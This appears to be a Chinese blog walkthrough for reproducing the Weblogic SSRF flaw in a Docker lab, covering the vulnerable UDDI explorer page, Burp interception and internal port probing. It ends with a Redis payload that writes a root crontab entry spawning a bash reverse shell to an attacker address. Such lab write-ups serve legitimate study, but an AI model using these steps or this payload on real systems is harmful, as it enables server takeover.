如何實(shí)現(xiàn)Weblogic SSRF漏洞復(fù)現(xiàn)

一、使用docker搭建環(huán)境

docker安裝及搭建環(huán)境教程:https://www.freebuf.com/sectool/252257.html

如何實(shí)現(xiàn)Weblogic SSRF漏洞復(fù)現(xiàn)

訪問7001端口如何實(shí)現(xiàn)Weblogic SSRF漏洞復(fù)現(xiàn)

二、漏洞復(fù)現(xiàn)步驟

1、漏洞存在頁面 /uddiexplorer/SearchPublicRegistries.jsp

如何實(shí)現(xiàn)Weblogic SSRF漏洞復(fù)現(xiàn)

2、檢查一下IBM這個(gè)地方看看

如何實(shí)現(xiàn)Weblogic SSRF漏洞復(fù)現(xiàn)

發(fā)現(xiàn)是個(gè)連接,這就可能存在ssrf了

3、使用burp suite抓包,點(diǎn)擊Search

如何實(shí)現(xiàn)Weblogic SSRF漏洞復(fù)現(xiàn)

如何實(shí)現(xiàn)Weblogic SSRF漏洞復(fù)現(xiàn)

4、修改operator參數(shù)的連接

如何實(shí)現(xiàn)Weblogic SSRF漏洞復(fù)現(xiàn)

5、訪問結(jié)果

訪問不存在的端口返回?could not connect over HTTP

如何實(shí)現(xiàn)Weblogic SSRF漏洞復(fù)現(xiàn)

訪問存在的端口返回狀態(tài)碼

如何實(shí)現(xiàn)Weblogic SSRF漏洞復(fù)現(xiàn)

訪問內(nèi)網(wǎng)

如何實(shí)現(xiàn)Weblogic SSRF漏洞復(fù)現(xiàn)

利用redis反彈shell的payload

set 1 "nnnn* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1nnnn" config set dir /etc/ config set dbfilename crontab save

? 版權(quán)聲明
THE END
喜歡就支持一下吧
點(diǎn)贊7 分享